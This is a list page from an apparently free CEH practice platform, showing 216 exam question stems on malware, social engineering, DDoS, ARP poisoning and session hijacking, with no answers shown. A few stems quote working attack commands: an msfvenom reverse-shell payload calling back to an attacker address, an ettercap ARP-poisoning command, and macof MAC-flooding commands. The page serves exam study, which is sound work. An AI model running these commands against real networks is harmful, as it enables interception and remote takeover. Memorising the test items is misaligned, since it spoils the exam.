Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.


Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


Malware, Social Engineering and Network Attacks

Practice CEH Malware, Social Engineering and Network Attacks questions with full explanations on every answer.

216 questions



All CEH Malware, Social Engineering and Network Attacks questions (216)


Click any question to see the full explanation and answer options, or start a focused practice session above.

1

A security analyst notices a high volume of ICMP Echo Reply packets on the network. The source IPs are varied, but the destination IP is the same. Which type of attack is MOST likely occurring?

2

A user receives a phone call from someone claiming to be from IT support, asking for their password to troubleshoot an issue. Which social engineering technique is being used?

3

Which tool would a penetration tester MOST likely use to perform ARP poisoning and conduct a man-in-the-middle attack on a local network?

4

An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?

5

A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?

6

An organization is experiencing repeated DDoS attacks that consume all available bandwidth. Which mitigation technique is MOST effective for handling such volumetric attacks?

7

Which type of malware is characterized by self-replication and spreading across networks without needing a host file?

8

A penetration tester uses the Social Engineering Toolkit (SET) to create a malicious USB drive that autoruns when inserted. Which social engineering technique is being employed?

9

An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?

10

Which type of malware encrypts the victim's files and demands payment for the decryption key?

11

A network administrator notices that the switch's CAM table is full, causing the switch to flood all incoming traffic out of all ports. Which attack is MOST likely occurring?

12

During a penetration test, you capture the following output: 'HTTP/1.1 200 OK ... Set-Cookie: sessionid=abc123; path=/'. You then send a request with a modified cookie value 'sessionid=abc124' and receive a valid session. Which type of vulnerability has been exploited?

13

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

14

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

15

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

16

A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?

17

Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?

18

A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?

19

An organization wants to test its employees' susceptibility to social engineering by sending fake emails that appear to come from the IT department, requesting password resets. Which tool would be MOST effective for conducting this test?

20

A security team observes that a switch's MAC address table is full, and the switch has started flooding unicast traffic to all ports. Which attack has MOST likely been performed?

21

Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?

22

An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?

23

A security analyst detects a file named 'invoice.pdf.exe' in an email attachment. When the file is submitted to VirusTotal, multiple engines detect it as a Trojan. The analyst wants to perform dynamic analysis to observe its behavior. Which approach is BEST?

24

Which type of social engineering attack involves a malicious actor impersonating a legitimate organization in a voicemail message to trick the victim into revealing sensitive information?

25

A penetration tester is performing a session hijacking attack. After capturing packets, the tester successfully predicts the TCP sequence numbers and injects packets to take over the session. Which type of attack is this?

26

A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?

27

An employee receives an email that appears to be from the CEO, requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ceo@cornpany.com instead of ceo@company.com). This is an example of which type of attack?

28

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

29

Which THREE of the following are techniques used in static malware analysis? (Select 3)

30

Which TWO of the following are common indicators of a DNS spoofing attack? (Select 2)

31

A security analyst discovers a user downloaded a file that, when executed, creates a hidden process that connects to a remote server and allows full remote control of the system. Which type of malware BEST describes this behavior?

32

A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?

33

An organization's security team observes a surge in outgoing DNS queries to external servers from a single internal host, with each query returning unusually large responses (e.g., 4000 bytes). The host is not configured as a DNS resolver. Which attack is MOST likely occurring?

34

A security analyst is investigating a suspicious file and wants to quickly determine whether it is known malware without executing it. Which approach should the analyst use FIRST?

35

A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?

36

Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?

37

During a penetration test, you execute a command that sends a large number of spoofed ICMP echo request packets to a subnet's broadcast address. This results in a flood of replies to the target system. Which attack have you performed?

38

A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?

39

A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?

40

Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?

41

A penetration tester uses the following command to scan a target: nmap -sU -sV -p 53,161,162 10.0.0.1. Which of the following BEST describes what this scan will accomplish?

42

An attacker calls a company's help desk, pretending to be a new employee who forgot his username and password. The attacker provides some employee details gleaned from social media and convinces the help desk to reset the password. Which social engineering technique is being used?

43

Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)

44

Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)

45

Which TWO of the following are examples of static malware analysis techniques? (Select two.)

46

A security analyst notices repeated failed login attempts from a single external IP address targeting the company's webmail portal. The attempts use common usernames like 'admin', 'user', and 'test'. Which type of social engineering attack is MOST likely being attempted?

47

During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?

48

An incident response team discovers a suspicious executable on a compromised workstation. They want to analyze the malware without executing it. Which of the following techniques would be MOST appropriate for this initial analysis?

49

A security analyst observes a sudden surge in incoming UDP traffic to the company's DNS servers from multiple external IP addresses. The packets appear to be DNS queries with spoofed source IPs. Which type of DDoS attack is MOST likely occurring?

50

Which of the following is a type of malware that spreads by replicating itself across a network without requiring a host file?

51

A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?

52

An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?

53

A security analyst is analyzing a suspicious file and runs the command 'strings malware.exe | grep -i http'. The output shows several URLs ending with '.exe'. What does this indicate?

54

Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?

55

A user reports that their computer is infected with ransomware. Which of the following is the BEST immediate action for the security team to take?

56

Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?

57

A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?

58

Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)

59

Which THREE of the following are examples of application-layer DDoS attacks? (Select 3)

60

Which TWO of the following are valid techniques for session hijacking? (Select 2)

61

A security analyst discovers a file named invoice.exe in an email attachment. Static analysis with PEiD indicates the file is packed with UPX. What is the BEST next step in analyzing this malware?

62

A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?

63

During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?

64

A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?

65

A user receives a phone call from someone claiming to be from IT support, asking for their password to perform a system update. This is an example of which social engineering technique?

66

A forensic analyst examines a system infected with malware that displays ransomware notes and encrypts files. The analyst uses a sandbox to observe behavior. During analysis, the malware contacts a C2 server and downloads additional payloads. Which type of malware analysis is being performed?

67

Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?

68

An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?

69

A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?

70

Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?

71

A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?

72

Which DoS attack exploits the HTTP protocol by sending partial HTTP requests to keep connections open, exhausting server resources?

73

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

74

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

75

Which TWO of the following are types of malware analysis? (Select 2)

76

A security analyst observes repeated failed login attempts from a single IP address targeting multiple user accounts. Which type of social engineering attack is being attempted?

77

A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?

78

During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?

79

An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?

80

A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?

81

After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?

82

An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?

83

During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?

84

An analyst is analyzing a suspicious file using VirusTotal and observes that only 3 out of 60 antivirus engines detect it as malicious. The file has been submitted before but with no detections. What should the analyst conclude?

85

A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?

86

An attacker wants to perform a man-in-the-middle attack on a local network. Which two tools from the following list would be most effective? (Select the best answer from the options below; note: this is a multiple choice, not multi-select) A) Wireshark B) Ettercap C) Nmap D) Metasploit E) Aircrack-ng

87

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

88

Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)

89

Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)

90

Which TWO of the following are examples of social engineering attacks? (Select two)

91

A security analyst notices an unusual spike in outbound traffic on UDP port 53 from a single internal host. The host is not a DNS server. Which type of malware is MOST likely responsible?

92

Which tool would an ethical hacker use to automatically generate a malicious USB drive that, when plugged in, executes a payload and connects back to the attacker?

93

During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?

94

A penetration tester wants to perform a stealth scan without completing the TCP three-way handshake. The target is a web server on port 80. The tester uses Nmap with the -sS flag. What is the expected behavior if the port is open?

95

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

96

A security analyst reviews logs and notices that an attacker crafted a packet with a source IP address matching the target's IP address, and sent it to a network's broadcast address. Which type of attack does this describe?

97

Which of the following is a characteristic of a polymorphic virus?

98

An organization experiences a DDoS attack where the attacker sends many incomplete HTTP requests that keep connections open, exhausting the server's connection pool. Which attack technique is being used?

99

During a social engineering engagement, an attacker calls an employee pretending to be from IT support and asks for their password to perform a system update. Which social engineering technique is being employed?

100

Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?

101

A company wants to defend against DNS amplification attacks. Which mitigation technique would be MOST effective?

102

An ethical hacker is analyzing a suspicious file using static analysis. Which of the following actions is part of static malware analysis?

103

Which TWO of the following are examples of application-layer DDoS attacks? (Choose two.)

104

Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)

105

Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)

106

A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?

107

Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?

108

An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?

109

A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?

110

Which tool can be used to perform ARP poisoning to intercept traffic between a victim and the default gateway?

111

A user reports that their system has become very slow and numerous pop-up ads appear even when browsing is not active. Which type of malware is MOST likely installed?

112

An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?

113

Which of the following is a form of social engineering where an attacker physically follows an authorized person into a restricted area without proper authentication?

114

An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?

115

A penetration tester runs the following command: `macof -i eth0 -s 192.168.1.100 -d 10.0.0.1`. Which attack is being performed?

116

Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?

117

An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?

118

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

119

Which THREE of the following are static malware analysis techniques? (Select 3)

120

Which TWO of the following are examples of session hijacking attacks? (Select 2)

121

A security analyst receives an email that appears to be from the CEO, urgently requesting a wire transfer. The email address is slightly misspelled (ceo@cornpany.com instead of ceo@company.com). Which type of social engineering attack is this?

122

During a penetration test, a tester uses a tool to perform ARP spoofing to intercept traffic between two hosts on the same subnet. Which tool is most commonly associated with this technique?

123

A security analyst runs the following command: 'python macof -i eth0 -n 1000'. Shortly after, the switch begins flooding traffic to all ports. What is the analyst trying to achieve?

124

A user reports that their system has become sluggish and they see pop-up advertisements even when no browser is open. Additionally, unknown processes are running in Task Manager. Which type of malware is most likely responsible?

125

A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?

126

After a security incident, an analyst retrieves a suspicious file. To determine if it is malicious without executing it, the analyst runs the 'strings' command and uploads the file to VirusTotal. Which type of malware analysis is being performed?

127

A penetration tester successfully predicts the TCP sequence numbers of a target and sends crafted packets to impersonate a trusted host. Which type of attack is this?

128

Which of the following is a type of malware that replicates itself by attaching to executable files and requires human action to spread, such as opening an infected attachment?

129

A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?

130

An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?

131

Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?

132

A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?

133

Which TWO of the following are characteristics of a polymorphic virus?

134

Which THREE of the following are effective DDoS mitigation techniques?

135

Which TWO of the following are examples of application-layer DDoS attacks?

136

A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?

137

During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?

138

A security analyst runs 'strings malware.exe' and finds several URLs and IP addresses. The analyst then uploads the file to VirusTotal and gets a detection ratio of 5/70. What type of analysis has been performed?

139

An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?

140

Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?

141

A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?

142

A security analyst captures network traffic and sees a sequence of ARP replies with the same IP address mapping to different MAC addresses within a short period. Which attack is indicated?

143

An attacker sends an email to the CEO of a company, pretending to be a board member and requesting a wire transfer for a confidential acquisition. Which social engineering attack is this?

144

A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?

145

Which of the following is the BEST defense against a TCP SYN flood attack?

146

A penetration tester uses a tool to spoof ARP replies, redirecting traffic through the tester's machine. The tester then captures credentials from the redirected traffic. Which tool is BEST suited for this task?

147

An employee receives an SMS message that claims to be from the IT department, asking the employee to click a link to verify their email account. Which social engineering attack is this?

148

Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)

149

Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)

150

Which THREE of the following are effective techniques to prevent ARP poisoning attacks? (Choose three.)

151

A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?

152

Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?

153

An attacker uses the Social Engineering Toolkit (SET) to craft a phishing email that appears to come from the company's CEO, requesting the recipient to urgently wire funds to a new vendor. This attack is BEST described as which type of social engineering?

154

During a penetration test, a tester captures network traffic and notices a large number of ARP replies claiming that 192.168.1.1 is at MAC address 00:11:22:33:44:55, which is different from the legitimate gateway MAC. Which attack is likely in progress?

155

A security administrator notices that the network switch is broadcasting traffic to all ports as if it were a hub. The switch logs show a sudden flood of packets with random MAC addresses. Which attack is MOST likely occurring?

156

A malware analyst wants to examine a suspicious executable without executing it. The goal is to extract strings, view the PE header, and check for known signatures. Which approach is the analyst using?

157

An organization experiences a DDoS attack where the attacker sends a flood of UDP packets to a server, causing it to become unresponsive. The packets appear to come from many different source IP addresses and are directed to random high-numbered ports. Which type of DDoS attack is this?

158

A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?

159

Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?

160

A penetration tester uses a tool to perform a man-in-the-middle attack by sending forged DNS responses that redirect users to a malicious website. Which tool is MOST likely being used to perform DNS spoofing?

161

During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?

162

An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?

163

Which TWO of the following are characteristics of a SYN flood attack? (Select 2)

164

Which THREE of the following are common methods used to mitigate DDoS attacks? (Select 3)

165

Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)

166

A security analyst receives an email from what appears to be the company's CEO requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ce0@company.com instead of ceo@company.com). Which type of social engineering attack is this?

167

A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?

168

A penetration tester needs to perform ARP poisoning to intercept traffic between two hosts on the same subnet. Which tool would be the most appropriate choice for this task?

169

During a ransomware incident response, a forensic analyst recovers a suspicious file that appears to be a PE executable. The analyst wants to quickly check if the file is known malware without executing it. Which of the following is the BEST first step?

170

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

171

A security team wants to mitigate a DNS amplification DDoS attack. Which of the following techniques would be MOST effective in preventing the attack from leveraging open DNS resolvers?

172

During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?

173

A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?

174

Which of the following is a characteristic of a polymorphic virus?

175

An attacker uses the Social Engineering Toolkit (SET) to send a malicious email to employees of a company, claiming to be from IT support and urging them to click a link to reset their password. Which social engineering attack is being performed?

176

An analyst runs the following command: `tcpdump -i eth0 src host 192.168.1.10 and dst port 80 -w http_traffic.pcap`. What is the primary purpose of this command?

177

A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?

178

Which TWO of the following are examples of application layer DDoS attacks? (Select two.)

179

Which THREE of the following are techniques used in session hijacking? (Select three.)

180

Which TWO of the following are types of malware analysis? (Select two.)

181

A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?

182

Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?

183

During a forensic investigation, an analyst retrieves a suspicious executable. Running `strings` reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into `explorer.exe`. Which conclusion is MOST accurate?

184

A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?

185

Which malware type is characterized by self-replication across networks without needing a host file?

186

An attacker gains physical access to a restricted area by following an authorized employee through a secured door without swiping a badge. This technique is known as:

187

A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?

188

Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?

189

A user receives a text message claiming their bank account is locked and requiring them to click a link to verify. This social engineering method is called:

190

Which malware analysis approach involves running the suspicious file in a controlled environment to observe its behavior?

191

A penetration tester uses a tool to perform a MAC flooding attack. What is the intended result of this attack?

192

Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?

193

Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)

194

Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)

195

Which TWO of the following are techniques used in session hijacking? (Choose 2)

196

A security analyst notices repeated TCP SYN packets sent to a server without corresponding SYN-ACK replies. The source IP addresses are spoofed and appear to be random. Which type of attack is MOST likely occurring?

197

A user receives an email claiming to be from their bank, asking them to click a link and verify their account credentials. The email contains spelling errors and the link points to a suspicious domain. What type of social engineering attack is this?

198

During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?

199

An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?

200

A security analyst receives an alert indicating that a workstation is sending outbound connections to a known malicious IP address. The analyst suspects a Trojan. Which tool is BEST for performing dynamic analysis of the suspicious binary?

201

An attacker intercepts a TCP session between a client and a server. By analyzing sequence numbers, the attacker successfully predicts the next sequence number and injects malicious packets. Which attack is being performed?

202

Which TWO of the following are characteristics of a polymorphic virus?

203

Which TWO tools are commonly used for ARP poisoning attacks?

204

Which THREE of the following are indicators of a slowloris DDoS attack?

205

Which TWO of the following are types of malware that specifically aim to demand payment from victims?

206

Which TWO of the following are examples of amplification attacks used in DDoS?

207

Which THREE of the following are techniques used in session hijacking?

208

Which TWO of the following are types of social engineering attacks that rely on impersonation?

209

Which THREE of the following are valid methods for DDoS mitigation?

210

Which TWO of the following are features of a Remote Access Trojan (RAT)?

211

A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?

212

During a penetration test, you run the tool `macof` against a switch. After a few seconds, the switch starts flooding frames out all ports. Which attack have you successfully executed, and what is the primary goal of this technique?

213

An attacker sends an email that appears to come from the CEO of the company, requesting an urgent wire transfer to a specific account. This is an example of which social engineering attack?

214

A network administrator notices unusual traffic patterns: the internal DNS server is receiving large DNS queries with the source IP spoofed to appear as the internal DNS server itself. The queries appear to be amplification requests. Which TWO characteristics describe this attack?

215

During a forensic investigation, you find a file named `svch0st.exe` in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?

216

A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?

Frequently asked questions

What does the Malware, Social Engineering and Network Attacks domain cover on the CEH exam?

The Malware, Social Engineering and Network Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.

How many Malware, Social Engineering and Network Attacks questions are in the CEH question bank?

The Courseiva CEH question bank contains 216 questions in the Malware, Social Engineering and Network Attacks domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Malware, Social Engineering and Network Attacks for CEH?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Malware, Social Engineering and Network Attacks questions for CEH?

Yes — the session launcher on this page draws questions exclusively from the Malware, Social Engineering and Network Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.